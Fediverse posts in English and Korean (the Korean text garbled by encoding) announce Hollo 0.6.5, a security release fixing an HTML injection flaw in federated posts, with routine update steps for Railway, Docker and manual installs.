Hollo :hollo:
@hollo@hollo.social

๐Ÿšจ Security Update: Hollo 0.6.5 Released

We've released 0.6.5 with a critical fix for CVE-2025-53941, addressing an HTML injection vulnerability in federated posts.

Please immediately to protect your instance from potential phishing and XSS attacks.

How to update:

  • Railway: Go to deployments โ†’ click three dots โ†’ Redeploy
  • Docker: docker pull ghcr.io/fedify-dev/hollo:latest and restart
  • Manual: git pull origin stable && pnpm install and restart server

github.com

Posts received with form elements are rendered allow submission

### Summary When an incoming post has form elements included, the elements are rendered and are submittable. Other platforms normally remove such elements before rendering. Please note that I a...

1 reply

Hollo :hollo:
@hollo@hollo.social ยท Reply to Hollo :hollo:

๐Ÿšจ ๋ณด์•ˆ ์—…๋ฐ์ดํŠธ: Hollo 0.6.5 ๋ฆด๋ฆฌ์Šค

CVE-2025-53941 ์ทจ์•ฝ์ ์„ ํ•ด๊ฒฐํ•˜๋Š” 0.6.5๋ฅผ ๋ฆด๋ฆฌ์Šคํ–ˆ์Šต๋‹ˆ๋‹ค. ์—ฐํ•ฉ ๊ฒŒ์‹œ๋ฌผ์˜ HTML ์ฃผ์ž… ์ทจ์•ฝ์ ์ด ์ˆ˜์ •๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

ํ”ผ์‹ฑ ๋ฐ XSS ๊ณต๊ฒฉ์œผ๋กœ๋ถ€ํ„ฐ ์ธ์Šคํ„ด์Šค๋ฅผ ๋ณดํ˜ธํ•˜๊ธฐ ์œ„ํ•ด ์ฆ‰์‹œ ์—…๋ฐ์ดํŠธํ•ด ์ฃผ์„ธ์š”.

์—…๋ฐ์ดํŠธ ๋ฐฉ๋ฒ•:

  • Railway: ๋ฐฐํฌ ํƒญ โ†’ ์  ์„ธ ๊ฐœ ํด๋ฆญ โ†’ Redeploy
  • Docker: docker pull ghcr.io/fedify-dev/hollo:latest ํ›„ ์žฌ์‹œ์ž‘
  • ์ˆ˜๋™: git pull origin stable && pnpm install ํ›„ ์„œ๋ฒ„ ์žฌ์‹œ์ž‘

github.com

Posts received with form elements are rendered allow submission

### Summary When an incoming post has form elements included, the elements are rendered and are submittable. Other platforms normally remove such elements before rendering. Please note that I a...